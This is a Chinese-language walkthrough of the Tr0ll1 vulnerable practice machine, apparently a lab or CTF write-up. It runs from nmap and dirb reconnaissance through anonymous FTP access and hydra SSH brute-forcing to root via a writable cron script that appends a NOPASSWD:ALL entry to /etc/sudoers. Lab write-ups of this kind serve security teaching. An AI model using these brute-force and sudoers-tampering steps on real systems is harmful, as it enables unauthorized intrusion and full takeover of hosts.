Tr0ll1靶机详解

admin 2025年3月18日19:24:36评论4 views字数 1228阅读4分5秒阅读模式

一、主机发现

arp-scan -l
Tr0ll1靶机详解

靶机ip为192.168.55.155

二、端口扫描、目录遍历、指纹识别

2.1端口扫描

nmap -p- 192.168.55.155
Tr0ll1靶机详解

发现该靶机的ftp端口开放,可能能直接进行连接

2.2目录遍历

dirb http://192.168.55.155
Tr0ll1靶机详解

找到了两个敏感目录

2.3指纹识别

nmap 192.168.55.155 -sV -sC -O --version-all
Tr0ll1靶机详解

说明ftp可以进行弱口令进入

三、靶机网页进行信息收集,拿下低权限用户

进入靶机网页,发现只有一张图片

Tr0ll1靶机详解

访问了dirb扫描出来的敏感路径,发现也没有很多信息,尝试ftp连接

弱口令:

anonymous
guest
Tr0ll1靶机详解

将该文件下载到kali本机中,然后使用wireshark打开

打开后容易发现这是一个tcp三次握手过程

Tr0ll1靶机详解

追踪该流,发现获取了secret_stuff.txt文件

Tr0ll1靶机详解

追踪另一个流,发现需要进入该目录下查找信息

Tr0ll1靶机详解

注:由于是分析其中的内容,也可以使用strings直接进行打开

strings lol.pcap 
Tr0ll1靶机详解

访问该url,找到了新的信息

Tr0ll1靶机详解

打开此文件,发现是32位的可执行文件

Tr0ll1靶机详解

可以使用binwalk进行查看其中是不是有捆绑文件

binwalk roflmao
Tr0ll1靶机详解

无捆绑文件,可以使用strings进行查看了

Tr0ll1靶机详解

靶机提示需要找到这个地址才能继续进行,访问一下试试

Tr0ll1靶机详解

发现有两个目录

第一个目录下的文件感觉是账号

第二个目录下的文件就一个,看文件名应该是密码

使用hydra进行暴力破解

一直爆破不成功,发现密码不是Good_job_:),而是Pass.txt,离谱啊

hydra -L 2.txt -p Pass.txt 192.168.55.155 ssh
Tr0ll1靶机详解

使用账号密码进行登陆

Tr0ll1靶机详解

成功拿下低权限shell

四、定时任务提权

注:此靶机一定时间后会自动退出

Tr0ll1靶机详解

使用python升级shell环境

python -c 'import pty;pty.spawn("/bin/bash")'

4.1靶机信息收集

uname -a
Tr0ll1靶机详解

4.2写入定时任务进行提权

由于在tmp目录中下载的提权辅助工具被删除,想到该靶机可能存在定时任务

查找定时任务

find / -name cronlog 2>/dev/null
Tr0ll1靶机详解

然后寻找该文件的位置

find / -name cleaner.py 2>/dev/null
Tr0ll1靶机详解

随后查看一下该文件的内容

cat /lib/log/cleaner.py
Tr0ll1靶机详解

使用vi将提权命令写入该脚本中

这个文件可以执行系统指令os.system,会每两分钟执行对目录/tmp的删除,那么我们只要把os.system()中的指令修改为:

'echo "overflow All=(All)NOPASSWD:ALL" >> /etc/sudoers'
Tr0ll1靶机详解

即可相当于为overflow用户追加了最高ALL权限,等待最多两分钟后,再次运行sudo -l,即可发现overflow的用户变为了最高权限

Tr0ll1靶机详解

然后启动root用户的shell

Tr0ll1靶机详解

提权成功!

原文始发于微信公众号(泷羽Sec-pp502的安全笔记):Tr0ll1靶机详解

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日19:24:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Tr0ll1靶机详解https://cn-sec.com/archives/3854918.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息